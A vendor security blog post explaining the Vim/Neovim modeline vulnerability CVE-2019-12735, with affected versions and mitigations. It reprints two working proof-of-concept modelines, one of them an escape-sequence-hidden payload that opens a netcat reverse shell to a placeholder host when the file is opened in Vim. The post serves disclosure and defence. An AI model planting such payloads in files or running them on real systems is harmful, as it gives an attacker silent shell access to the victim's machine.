Open a text file and lose your system to hackers!

credits: www.securityaffairs.co

Code Red! To all the Linux users out there, you have a high probability of getting your system hacked if you are using an older version of the command-line text editor.

The most popular and commonly used Vim editor and it’s extension, the Neovim editor were recently found to be vulnerable to arbitrary code execution using a crafted text file. Both the editors come pre-installed with several Linux-based operating systems. This vulnerability has been assigned CVE-2019-12735 and was discovered by the security expert, Armin Razmjou. The security advisory published by the security researcher last week includes two Proof-of-Concept exploits to support his claim.

The exploit mainly takes advantage of the ‘modelines’ handling methods of Vim. Modelines enable a user to set variables specific to a file. Vim analyzes these variables, which are generally placed at the start or the last few lines of a file and makes appropriate changes, like setting a tab to 5 spaces.

Proof of Concept:

1. The first PoC file mentioned in the advisory contained the following:

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

After saving this in a text file, say poc1.txt, run the following command:

$ vim poc1.txt

As soon as you run this command, you can see the output of the command ‘uname -a’

2. A typical real-life scenario can be demonstrated using the following PoC.

Consider the following command:

\x1b[?7l\x1bSWelcome to SecPod Technologies.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 1234 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KWelcome to SecPod Technologies."\x16\x1b[D \n

In the above line, an attacker embeds the command to set up Netcat and contact a machine of his/her choosing and sets up Netcat to listen to a specific port for an incoming connection. All that the attacker has to do is get an unsuspecting user to open the text file using Vim, following which the attacker gains complete access to the user’s system.

user’s screen (L) and the attacker’s screen (R)

Generally, a modeline does not allow options other than ‘set’. All other options will be executed in a sandbox to prevent security risks like shell command execution. However, Armin pointed out that the sandbox can be bypassed by using a :source! command (with the bang [!] modifier) . This runs and executes a command in such a way that the execution takes place after the sandbox is exited, which basically means that a modeline can be crafted to run code outside a sandbox.

# vim: set foldexpr=execute('\:source! some_file'): In case of Neovim, which prevents execute() from running, assert_fails() can be used instead, as it takes a {cmd} argument too.

This vulnerability has been assigned a high severity rating.

Affected versions: Vim : 8.1.1365 and earlier

                              Neovim : 0.3.6 and earlier

Solution/Mitigation

While the source code has been updated, we are yet to receive the updates from the respective Linux Vendors. Fedora has already released a patch and hopefully others will soon follow.

As additional measures, the researcher also recommends to

  • Disable modelines in the vimrc with the following commands

set modelines=0

set nomodeline

  • To use the securemodelines plugin, or to disable modelineexpr (since patch 8.1.1366, Vim-only) to disallow expressions in modelines.

Use SanerNow to detect and mitigate these vulnerabilities and prioritize your patching.


Subscribe For More Posts Like This

Get the latest research, best practices, industry trends and cybersecurity blogs from SecPod security experts

Invalid email address
We promise not to spam you. You can unsubscribe at any time.
0 0 vote
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments